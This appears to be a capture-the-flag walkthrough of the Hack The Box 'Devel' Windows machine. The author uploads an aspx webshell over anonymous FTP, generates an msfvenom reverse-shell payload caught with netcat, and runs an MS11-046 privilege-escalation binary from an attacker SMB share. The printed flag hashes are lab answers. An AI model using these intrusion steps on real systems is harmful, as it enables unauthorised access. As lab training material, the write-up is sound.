Devel - Hack The Box

February 16, 2021

  1. [root:/git/htb/devel]# nmap -Pn -n -sCV –open (master✱) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM

    aspnet_client | 03-17-17 04:37PM 689 iisstart.htm |03-17-17 04:37PM 184946 welcome.png | ftp-syst: | SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows



    • Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
  2. The FTP server is open for anonymous login, let see what we can do there.

[root:/git/htb/devel]# ftp (master✱) Connected to 220 Microsoft FTP Service Name ( anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ? Commands may be abbreviated. Commands are:

We have the option to ‘put’ (upload) files to the ftp, and looking around it seems like we are in webroot. Lets upload a webshell and browse to it. Since it’s not a .php-server, lets upload a .aspx-shell.

ftp> put aspxshell.aspx local: aspxshell.aspx remote: aspxshell.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 5273 bytes sent in 0.00 secs (22.0558 MB/s)

Go to to enumerate the box further.

whoami iis apppool

  1. Instead of looking around in a webshell, lets create a reverse aspx payload and upload it to the box.

    [root:/git/htb/devel]# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4488 -f aspx > rev.aspx (master✱) [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of aspx file: 2721 bytes

    Browse to to trigger the rev-shell.

    [root:/git/htb/devel]# nc -lvnp 4488 (master✱) listening on [any] 4488 … connect to [] from (UNKNOWN) [] 49158 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.

    c:>whoami iis apppool

I can’t find any vulnerabilities by just looking around. Watson is a Windows exploit suggester that we can run from a locally hosted SMB server. Download pre-compiled Watson and execute it on the victim, through your SMB-server.

[root:/srv/pub-share]# service smbd start [root:/srv/pub-share]# cp /opt/winPE/binaries/watson/WatsonNet3.5AnyCPU.exe .

 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Process IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

  [*] Appears vulnerable to MS10-073
   [>] author: "0xPThree"

description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel. [>] Exploit: [>] Notes: None.

  [*] Appears vulnerable to MS10-092
   [>] author: "0xPThree"

description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. [>] Exploit: [>] Notes: None.

  [*] Appears vulnerable to MS11-046
   [>] author: "0xPThree"

description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges. [>] Exploit: [>] Notes: None.

  [*] Appears vulnerable to MS12-042
   [>] author: "0xPThree"

description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode. [>] Exploit: [>] Notes: None.

  [*] Appears vulnerable to MS13-005
   [>] author: "0xPThree"

description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation. [>] Exploit: [>] Notes: None.

 [*] Finished. Found 5 vulns :)
  1. We are presented with various vulnerabilities, MS11-046 sounds great as it “allows local users to elevate privileges” which is exatly what we want. Upload the malicious .exe to your local SMB server and execute it on the remove host.

    [root:/srv/pub-share]# cp /opt/windows-kernel-exploits/MS11-046/ms11-046.exe . [root:/srv/pub-share]# chmod +x ms11-046.exe

    c:>\ \

    c:>whoami nt authority

    C:>type user.txt.txt 9ecdd6a3aedf24b41562fea70f4cb3e8

    C:>type root.txt e621a0b5041708797c4fc4728bc72b4b


Pre-compiled Watson Binaries:

Windows Kernel Exploits: